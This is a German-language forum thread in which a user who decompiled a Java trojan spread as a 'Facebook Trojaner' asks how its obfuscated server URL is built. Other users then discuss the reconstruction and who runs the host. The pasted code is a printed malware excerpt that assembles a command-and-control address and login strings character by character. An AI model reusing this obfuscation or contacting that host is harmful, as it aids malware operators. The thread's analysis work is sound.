Viren, Spyware, Datenschutz 11.214 Themen, 94.192 Beiträge

Verfolgung starten Optionen

Wie ist die URL?

torsten40 / 8 Antworten / Flachansicht Nickles

Hi,
ich hab eine *.jar decompeliert, und guck jetzt einwenig in den Code herum.
Dabei ist mir die URL aufgefallen.
Bei der URL bin ich jetzt bei

http://
neposopuhote.redirectment
:83
/service/index.php

Wie setzt sich das ganze zusammen?

Danke
###

this.session = ("" + System.currentTimeMillis());
    this.domain = "n"; this.serviceUrl = "h"; this.domain += "e"; this.domain += "p"; this.serviceUrl += "t"; this.domain += "o";
    this.domain += "s"; this.domain += "o"; this.domain += "p"; this.domain += "u"; this.serviceUrl += "t"; this.domain += "h"; this.domain += "o"; this.domain += "t";
    this.domain += "e";
    this.domain += ".";
    this.domain += "r";
    this.serviceUrl += "p";
    this.domain += "e";
    this.domain += "d";
    this.domain += "i";
    this.pwd = this.number;
    this.pwd += "d";
    this.domain += "r";
    this.serviceUrl += ":";
    this.domain += "e";
    this.domain += "c";
    this.pwd += "w";
    this.usr = "u";
    this.domain += "t";
    this.domain += "m";
    this.domain += "e";
    this.usr += "s";
    this.serviceUrl += "/"; this.domain += ".";
    this.serviceUrl += "/";
    this.domain += "n";
    this.domain += "e";
    this.domain += "t";
    this.serviceUrl += this.domain;
    this.serviceUrl += ":";
    this.serviceUrl += "8"; this.serviceUrl += "3"; this.serviceUrl += "/";
    this.serviceUrl += "s";
    this.serviceUrl += "e";
    this.serviceUrl += "r";
    this.usr += "r";
    this.serviceUrl += "v";
    this.serviceUrl += "i";
    this.serviceUrl += "c";
    this.serviceUrl += "e";
    this.serviceUrl += "/";
    this.serviceUrl += "i";
    this.serviceUrl += "n";
    this.serviceUrl += "d";
    this.serviceUrl += "e";
    this.serviceUrl += "x";
    this.serviceUrl += ".";
    this.serviceUrl += "p";
    this.serviceUrl += "h";
    this.serviceUrl += "p";
    this.pwd += "p";
    this.usr += this.number;

Das Ding ist in Viren usw, weils in einem "Facebook Trojaner" ist

Freigeist
bei Antwort benachrichtigen
redirect.net anschsonetn scheint die URL aber zu passen. ... Borlander
Da hatte ich wohl n dreher in der URL. Mittlerweile ist die ... torsten40
Dir ist aber schon klar, dass das zum einen bei einem nicht ... Borlander
irgendwo hin verbindet sich jeder Trojaner. Dann wusste der ... torsten40
Nicht jede Schadsoftware ist in Java implementiert und hat ... Borlander
torsten40 Borlander „Nicht jede Schadsoftware ist in Java implementiert und hat ...“
Optionen

nun ... der downlink zu dieser Datei verbreitete sich über einen lokalen Rechner, auf dem ein Webserver oder ähnliches installiert war/ist. Zudem verbindet sich der Trojaner zu einer noip Adresse, die mit der IP des downloadlinks übereinstimmt.
Unwahrscheinlich aber möglich, dass der Rechner selber Opfer ist

Das Opfer weiß womöglich bis heute nichts davon, dass auf seinem System ein Webserver betrieben wurde
und unbemerkt noip konfiguriert haben?
Unwahrscheinlich, aber möglich.

Nicht jede Schadsoftware ist in Java implementiert und hat die selbe innere Struktur…
Das weiß ich auch ...Dennoch muss sich ein Trojaner/Keylogger (egal welche Porgrammiersprache) irgendwo hinverbinden, und diese Verbindung steht nunmal im Sourcecode. Der Weg dies auszulesen, ist lediglich ein anderer ...
Freigeist
bei Antwort benachrichtigen
lokaler Rechner? Die einzige Herausforderung ist da die ... Borlander
privater Rechner Richtig, dass ist aber eher seltener torsten40